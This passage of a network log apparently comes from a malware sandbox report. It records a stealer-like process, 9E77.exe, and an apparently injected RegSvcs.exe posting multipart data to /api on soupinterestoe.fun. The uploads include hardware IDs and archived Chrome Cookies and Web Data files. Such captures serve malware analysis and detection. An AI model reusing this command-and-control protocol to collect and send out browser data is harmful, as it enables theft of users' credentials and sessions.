must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FaMdpHr0cz07V%2FDRAWoCK1VUjSoXIPTPVaAPIFsEKWtkggdqt5SAKyG8ruQvxqiN47C52VYxD2X6NOze5E9unZ0V0Wvca7i%2Bx2JAc9fpYkj3G8%2B9AwqwS5bzn6ZnScFuU8SWz3U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330f9d Data Raw: Data Ascii:
Dec 27, 2023 18:12:57.084500074 CET	41	IN	Data Raw: 33 38 65 38 32 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 38e823-DFW15Malformed packet data
Dec 27, 2023 18:12:57.084763050 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49775	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:57.320950985 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:57.321178913 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:57.701523066 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=tj8e2vil8677kslt8qfv7hrg55; expires=Sun, 21-Apr-2024 10:59:36 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kVGe1kJ9AZzcvE1%2BAql1RuK5lOljZiH9%2F7fYOoKm8mRIvFwp7okUM7dg0QwSclcnYWLTBjpnF26dFO3XAK8E2Dhow%2FU3SBjnJUefr%2FavcFZk0J%2B1Zc0LBIe2Upx%2FDR1qOcI9sg0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:12:57.701586962 CET	45	IN	Data Raw: 66 65 61 61 66 32 36 62 38 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: feaaf26b89-DFW15Malformed packet data
Dec 27, 2023 18:12:57.701600075 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49776	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:57.583997011 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:57.584131956 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:58.128505945 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=2m247cpv5kcu3dv6j0ss4mio07; expires=Sun, 21-Apr-2024 10:59:36 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hsZJJsL38xJQT8j4XRRYWBojDUeQ92gl8bcveZ82Hkc9F0vdMOfrPOBh%2BSS%2BbIWTl%2Frdk6957kT2X2%2FMWQD%2B1vAeUg1oZ0ckAofay%2BTbDfIPdSYE%2F2GIf7HzrV8a9k5ilebV50k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 18:12:58.128524065 CET	47	IN	Data Raw: 33 31 30 30 34 61 33 31 34 36 38 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 31004a314684-DFW15Malformed packet data
Dec 27, 2023 18:12:58.128535032 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49777	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:58.362143040 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:58.362314939 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:58.903114080 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=a8gm9i5f2hudjv1ukdc5fbk8qd; expires=Sun, 21-Apr-2024 10:59:37 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p9VbawPXz97vh3Vs7u4KFx0mbVgwzGrTVatRPdXvLSS0oQ%2BtUZjbbIX9Bn49FeWzu3NwOfI%2Fa91gETmh14b0suiMe63FPA4jeGgu2NQ8jivCTnL9WYwM8dAxBh%2FwvbDIWPC%2BV90%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331052 Data Raw: Data Ascii:
Dec 27, 2023 18:12:58.903127909 CET	41	IN	Data Raw: 66 64 61 61 37 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: fdaa7c-DFW15Malformed packet data
Dec 27, 2023 18:12:58.903139114 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49778	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:58.582349062 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:58.582564116 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:59.115448952 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=p2gbqn1p8f6k9fn68ms0omksfv; expires=Sun, 21-Apr-2024 10:59:37 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JZeXIp1JznLs22vCjNr3eMVfg0NMVen6EsaKDxjeh9uIDnSnyjmzPLwHB8YSH8t8alKF7JLI6x9FpsiTjNGqlRkJ8Cbu1rrlaU3VSHr9lCYBihE1rlBLAug0del0sa0e7LATiNw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331068eae4762- Data Raw: Data Ascii:
Dec 27, 2023 18:12:59.115459919 CET	33	IN	Data Raw: 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: FW15Malformed packet data
Dec 27, 2023 18:12:59.115469933 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49779	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:59.805866003 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19685 Host: soupinterestoe.fun
Dec 27, 2023 18:12:59.805951118 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:59.927443027 CET	1286	OUT	Data Raw: dd 0e b9 ef 5c c9 49 eb 13 47 fb 51 ee 96 32 70 a4 dc 0d 19 c7 f7 ff 00 00 00 40 fa e0 eb 7f 56 98 14 fa 7e 9e 29 b2 8f 63 38 10 fa 87 85 0b 85 27 cf 86 f2 83 83 92 9b 19 1c dc 7c 27 cf d8 1c e4 dc 73 b5 6d fe f7 c0 d4 d9 95 ff 55 cc 49 cd ac 57 Data Ascii: \IGQ2p@V~)c8'\|'smUIWa<5*;\|0.wjibdU(?kbFm7nlog&ntmbf1f?2!ijud/s#vT>f!opwww')[i2R2f
Dec 27, 2023 18:12:59.927500010 CET	2572	OUT	Data Raw: 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 00 04 00 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 2f 4e 65 74 77 6f 72 6b 2f 43 6f 6f 6b 69 65 73 01 00 00 00 ed 9c 07 58 13 59 bb c7 27 94 10 08 21 22 5d 40 10 44 51 4a e8 45 44 Data Ascii: Chrome/Default/Network/CookiesXY'!"]@DQJEDM1IBQ(; 6\\|bU.boX^QEQ;D{w~>!9314e\|P[[KC~i}5X5hB?Z:f(y0W
Dec 27, 2023 18:12:59.927525997 CET	4253	OUT	Data Raw: 5b 48 27 d6 fc b6 f9 ae 01 f6 81 59 c7 4b 8f 3c ab 60 d6 20 a9 ab 70 89 cb 56 2f 1f 59 c4 ab a6 1d 25 f9 07 96 25 95 17 6e b9 17 53 bb c5 0c c5 1f 3e b5 3a 69 b2 b2 08 ad dd 1b 5d 54 ba 54 b1 0a 1f 66 e2 8d 95 5f 03 91 03 0b f0 e4 da c5 81 83 2c Data Ascii: [H'YK<` pV/Y%%nS>:i]TTf_,XxQw'Fscxf\|m7-8+Tyr]Ej[_'wh7g2I]M izF,w1nEJXZ%Y+[iU`E*Zfiq
Dec 27, 2023 18:13:00.371097088 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=kq2hs42d8qs7bgo820uuk91lpt; expires=Sun, 21-Apr-2024 10:59:39 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:00 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:00 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:00 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n1AavwGVA5PkelV3JZm4%2FyzJ7dHMM6Wlc7IIgdR8sOTBcZB5kM7HfH9TFD2sZQSu3xG20Fs53x3BeMaLswxEx%2BlW0QyEMCF8HA2GBaVjA8v2qEqT2Mzi45A3jVbnIdKP2GilY4Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3310e29966 Data Raw: Data Ascii:
Dec 27, 2023 18:13:00.371109009 CET	30	IN	Data Raw: 63 65 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: ce-DFWfok 212.102.41.2
Dec 27, 2023 18:13:00.371119976 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49780	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:01.223839045 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:01.223901033 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:01.754369974 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=om6k5eka559e1fkrrodf6r80qv; expires=Sun, 21-Apr-2024 10:59:40 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PC1hTRkBpz9Al%2BTNrhu%2BsiLGf0gWLRfqqCKtV1K9dDnKPiXS7dE9Z49cB2aqmj5hgnvtqP27g94B2t%2B8UwpPCqYyBiH09NBfyhVXNpMin%2F0K0ONrnLHe5YBaCgJ0XJNCuKsYiBo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331170 Data Raw: Data Ascii:
Dec 27, 2023 18:13:01.754383087 CET	41	IN	Data Raw: 35 61 61 61 31 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 5aaa1f-DFW15Malformed packet data
Dec 27, 2023 18:13:01.754389048 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49782	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:03.157166004 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 24320 Host: soupinterestoe.fun
Dec 27, 2023 18:13:03.157378912 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:03.278297901 CET	1286	OUT	Data Raw: 2e 1a b4 85 d3 27 af f7 ca f1 1a 82 6b b5 74 cd 61 b3 4a 62 28 57 e8 a3 1e bc e1 fb 37 37 5a 72 3a 20 0a 9c d4 26 de 13 d8 9d 4b 04 22 ba 93 8b c0 3c 20 30 db 9e 0e 4d 3d 82 ef 45 d5 f0 86 63 2e 5d 2d 51 fc b7 66 a8 f8 06 5d f4 68 d3 1f 02 a1 8e Data Ascii: .'ktaJb(W77Zr: &K"< 0M=Ec.]-Qf]hOfB$.xxa{MvFsTSneG!B7zHyWN=k;`awY,fSls43{ aPs`QvSMKR-S'k %tHh/5tapp
Dec 27, 2023 18:13:03.278503895 CET	2572	OUT	Data Raw: 16 9a a2 d7 68 5d b8 c4 6e 6d 97 4e 15 17 ee 1b 52 47 f1 0e 1f bf 96 b8 91 22 7e e0 45 10 d4 78 a7 72 90 db 74 7a c5 cb 79 99 e6 5c a1 39 2f 2f 2d d3 9c cb 2b 2c e7 8a 97 f3 72 79 a5 9f 73 85 e5 fc d8 23 2c e7 58 51 d0 33 fb de 3b b6 a5 c7 2d ce Data Ascii: h]nmNRG"~Exrtzy\9//-+,rys#,XQ3;-PK=B@pPKWChrome/Default/Web DatasF~1r@J;Z!iEq,>4(HdF)au@g3J!q*9!m
Dec 27, 2023 18:13:03.278531075 CET	5144	OUT	Data Raw: d9 40 a9 7f bf 7f 32 6b 09 9f 08 9f e4 ce 08 20 75 ac 7e 98 93 b4 f9 a4 83 d7 c2 a7 79 f9 67 bc 79 07 e4 d9 4a 31 29 e6 52 6b f5 03 51 9a 9f cf 1c 14 0f 9d 1a 16 96 4b 0a bf 98 78 9a 58 58 2a 7a b2 d8 b8 1c 3e 6c 2e 38 57 ae 7b 1e 22 b1 68 99 6a Data Ascii: @2k u~ygyJ1)RkQKxXXz>l.8W{"hj?;O''[(I/HE\hjXL>_T760Qgf!]wlgC)8tjZ%UzZH)G'%D\|@2<U$%"I=j.zgL
Dec 27, 2023 18:13:03.278625011 CET	3744	OUT	Data Raw: 4c e1 92 cf d5 c5 9d 54 79 0d 53 b6 7b af 97 d5 23 9c 87 b5 05 76 30 9b f6 22 11 56 ca d6 32 cf a1 33 54 77 f7 0d 27 59 72 53 b3 de 2f 88 01 5f 6d a0 f6 93 07 a6 3f 9e 2e c0 56 5b 42 29 97 db 1e f8 1a 9e df 2a 7b f8 f0 f2 93 0b af 5f ae 33 7a 56 Data Ascii: LTyS{#v0"V23Tw'YrS/_m?.V[B)*{_3zVd~aMUG0QsNcG\|szT#ttDu/OXTojF"s~T@OAno}w\|P?-Si
Dec 27, 2023 18:13:03.739608049 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=g9c01jk2dvo8971609nqeeprgi; expires=Sun, 21-Apr-2024 10:59:42 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f19AucawS7fkmadXsh%2BfC6a22S0IJFLPDCy87s4co5cAzilDALbgWznGZWXvIOv%2F99xJyQLOd69VH0s5EP6rOabVut2ZgrgltrnijuNlViLVtz%2FSGDje1F50AbSVd6%2FlI1vqCKo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331232 Data Raw: Data Ascii:
